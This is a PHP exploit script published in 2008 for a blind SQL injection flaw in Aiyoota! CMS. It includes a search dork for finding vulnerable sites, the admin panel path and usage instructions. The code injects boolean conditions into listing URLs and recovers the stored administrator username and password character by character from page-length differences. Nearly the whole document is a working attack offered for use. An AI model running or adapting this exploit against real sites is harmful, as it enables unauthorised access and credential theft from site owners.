Aiyoota! CMS - Blind SQL Injection Exploit
Source: www.vfcocus.net   Author: Lidloses   Published: 2008-12-16
<?php
    // Aiyoota! CMS blind SQL injection. The listing URL
    // /<language>/<naviID>/<ueber>/<aiyootaID>/<file> is split after naviID
    // and a boolean condition is injected there. The first row of the Zugang
    // table (columns benutzer and passwort) is read one character at a time by
    // comparing the length of the page returned for true and false conditions.
    ini_set("max_execution_time", 0);
    ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    print_r('
###############################################################
#
#           Aiyoota! CMS - Blind SQL Injection Exploit     
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, Free-Hack
#      Date:                        16.12.2008
#
###############################################################
#                                                             
#      Dork: inurl:naviid + inurl:liste9
#      Admin Panel: [Target]/cms/
#      Usage (Method 1 auto):  php '.$argv[0].' -1 [Target]
#      Usage (Method 2 manually):  php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
#      Example (Method 1) for http://www.site.com
#      => php '.$argv[0].' -1 http://www.site.com
#      Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
#      => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
#                                                             
###############################################################
');
    $url = $argv[2];
    if (($argv[1] == "-1" || $argv[1] == "-2") && ($argc == 3 || $argc == 8)) {
        if ($argv[1] == "-1") {
            // Method 1: fetch the start page and take the first content link
            // (skipping links into the /cms/ admin panel) to learn the language
            // and the rest of the path automatically.
            $source = file_get_contents($url."/index.html");
            $buffer = $source;
            if (strpos($source, "a href='$url/") !== false) {
                // absolute link: <target>/<language>/<naviID>/...
                $place = strpos($source, "a href='$url/");
                $sprache = substr($source, $place+8+strlen($url)+1, strpos(substr($source, $place+8+strlen($url)+1), "/"));
                $urlpart = substr($source, $place+8, strpos(substr($source, $place+8), "'"));
            } else {
                // relative link: advance past every link that points into /cms/
                while (substr($buffer, strpos($buffer, "a href='/")+9, 3) == "cms") {
                    $buffer = substr($buffer, strpos($buffer, "a href='/")+9);
                }
                $place = strpos($buffer, "a href='/");
                $sprache = substr($buffer, $place+9, strpos(substr($buffer, $place+9), "/"));
                $urlpart = $url."/".substr($buffer, $place+9, strpos(substr($buffer, $place+9), "'"));
            }
            // split the link right after the naviID; the injection goes in between
            $varstart = strpos($urlpart, $sprache)+strlen($sprache)+1;
            $injplace = strpos(substr($urlpart, $varstart), "/") + $varstart;
            $part1 = substr($urlpart, 0, $injplace);
            $part2 = substr($urlpart, $injplace);
        } else {
            // Method 2: language, naviID, ueber, aiyootaID and file given on the command line
            $part1 = $url."/".$argv[3]."/".$argv[4];
            $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
        }
        echo "\nExploiting now!\n\n";
        // calibration: the page for a true and for a false condition must differ in length
        $true = file_get_contents($part1."+and+1=1".$part2);
        $false = file_get_contents($part1."+and+1=0".$part2);
        $tbl = array("benutzer", "passwort");
        if (strlen($false) != strlen($true)) {
            for ($mode = 0; $mode <= 1; $mode++) {
                echo $tbl[$mode].": ";
                $break = 0;
                $count = 0;
                while ($break == 0) {
                    $count++;
                    // ASCII code of character $count of the column value
                    $sel = "ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))";
                    // MySQL returns 0 for ascii('') : a true page here means the value has ended
                    $zero = file_get_contents($part1."+and+$sel=0".$part2);
                    if (strlen($false) / strlen($zero) * 100 < 98) {
                        $break = 1;
                        echo "\n";
                        continue;
                    }
                    // A response counts as "true" when it is at least ~2% longer than the
                    // false page. Five requests narrow the character to one of five ranges:
                    // m-z, a-l, digits, ':'..'E', 'F'..'`'.
                    $injpart1 = file_get_contents($part1."+and+$sel>96".$part2);
                    $injpart2 = file_get_contents($part1."+and+$sel>108".$part2);
                    $injpart3 = file_get_contents($part1."+and+$sel<=96".$part2);
                    $injpart4 = file_get_contents($part1."+and+$sel<70".$part2);
                    $injpart5 = file_get_contents($part1."+and+$sel<58".$part2);
                    $border1 = 32;   // fallback: any printable character
                    $border2 = 126;
                    if (strlen($false) / strlen($injpart1) * 100 < 98) {
                        if (strlen($false) / strlen($injpart2) * 100 < 98) {
                            $border1 = 103;
                            $border2 = 122;
                        } else {
                            $border1 = 96;
                            $border2 = 108;
                        }
                    }
                    if (strlen($false) / strlen($injpart3) * 100 < 98) {
                        if (strlen($false) / strlen($injpart4) * 100 < 98) {
                            if (strlen($false) / strlen($injpart5) * 100 < 98) {
                                $border1 = 47;
                                $border2 = 57;
                            } else {
                                $border1 = 59;
                                $border2 = 69;
                            }
                        } else {
                            $border1 = 70;
                            $border2 = 96;
                        }
                    }
                    // walk the range: the first $i for which ">$i" is false is the character
                    for ($i = $border1; $i <= $border2; $i++) {
                        $inj = file_get_contents($part1."+and+$sel>$i".$part2);
                        if (strlen($inj) / strlen($true) * 100 < 98) {
                            echo chr($i);
                            break;
                        }
                    }
                }
            }
        } else {
            echo "True and false pages have the same length: no boolean oracle, target does not look vulnerable.\n";
        }
    } else {
        echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
    }
?>